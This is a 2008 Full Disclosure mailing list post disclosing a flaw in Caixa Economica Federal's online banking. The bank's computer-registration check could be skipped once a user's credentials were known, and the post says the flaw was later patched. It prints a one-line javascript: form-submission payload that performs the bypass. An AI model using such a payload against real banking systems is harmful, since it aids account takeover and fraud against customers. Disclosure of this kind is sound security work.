Full Disclosure mailing list archives

Re: Brazilian Bank (Caixa Economica Federal) vuln

From: "H2G-Labs Information Security" <h2glabs.infosec () gmail com>
Date: Fri, 20 Jun 2008 10:11:27 -0300

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Hi folks,
some brazilian banks has implementing a system based in computer
identification (like a PC register).

The system have some vulns and can be easily exploited.

I am trying to contact the Caixa Economica Federal
(http://www.caixa.gov.br) without success.

If the attacker have the USERNAME and the PASSWORD of the user
account, the attacker can log in on the bank account without identify
the computer.

To this, after enter the USERNAME and PASSWORD of account, pute the
code in browser (in agree terms page):
javascript:document.forms[0].onsubmit='';document.forms[0].navegacao.value='16';document.forms[0].submit();void(0);

And you will be logged in, without need register/identify you machine.

I hope the CAIXA team solve this problem hurry.

Sorry to my bad english, I am brazilian.

Regards...


This vulnerability has patched!

Regards...

- --
H2G-Labs Information Security
Igor Marcel - Information Security Consultant
H2GLabs.InfoSec "at" Gmail.com

-----BEGIN PGP SIGNATURE-----
Version: GnuPG (PRIVATE)
Comment: H2G-Labs Information Security

iQIVAwUBSFustsJBTfehHgWwAQpEhA/9HPOOC/fiUY4jmDcBWeSfMK6OEyRLkQtM
pwpnKksGkptrs8u8PvtfvEhcLEAeegNlVQdGsaZ9I/KgSyRR/b65KhWYXu5jITPW
3DWli+EhEV3O1N0BVDcmID8T8FO2Xi7DhKU5ii4gBqU0idyQTqQY+Jt+NwhcC0p2
/V831nhalXP7R8ApNradIuLCiWo/6rs6dOUo1wONfk4b03cEZhg5XzUyMM+xwiG2
UAHfG1L1aGNJhLZLIh03dGDjJ/83L+cax7jcRTU74W+yxj0oE+972KzdNXJE6RWi
4fZi88BlqZSPb4f1fVfTPVEPOdZ5VcT7LJS++LfjCtnoa+NjsgPOzxmq5QDsuCbh
bJAAlcR8ESZxfFAiQisXJTlKx4xEkGvI9r5jyEE60Lg9mc9SubCr/c71AOSDJ1H0
1b7ZzWGqE5xkYe8Z4By7Ktvl+4aAcR1fMaDMrsJnrqq5hkDNMIG5pCGu9bGD2mRd
V9MljIDnkrhxJMha76I4/86E/FYBjUppEdLHLMRpW+2pQEyEURKAI+vUiCrwrl5t
OeH4x3JBJwUUCL2Z+dXVJaPL0oK4Mys39PRrSiaNWuohqopkmkxrelfeZQVFEe9P
ZawC/fwk2x4vL2zJ/Uaq0Aza6OxvSYtcnX2TIN3n0qUmhcaAp3M6J896oFYBoEhS
pRY51whrUxU=
=lKdg
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Current thread:

Brazilian Bank (Caixa Economica Federal) vuln H2G-Labs Information Security (Jun 19)
- <Possible follow-ups>
- Re: Brazilian Bank (Caixa Economica Federal) vuln H2G-Labs Information Security (Jun 20)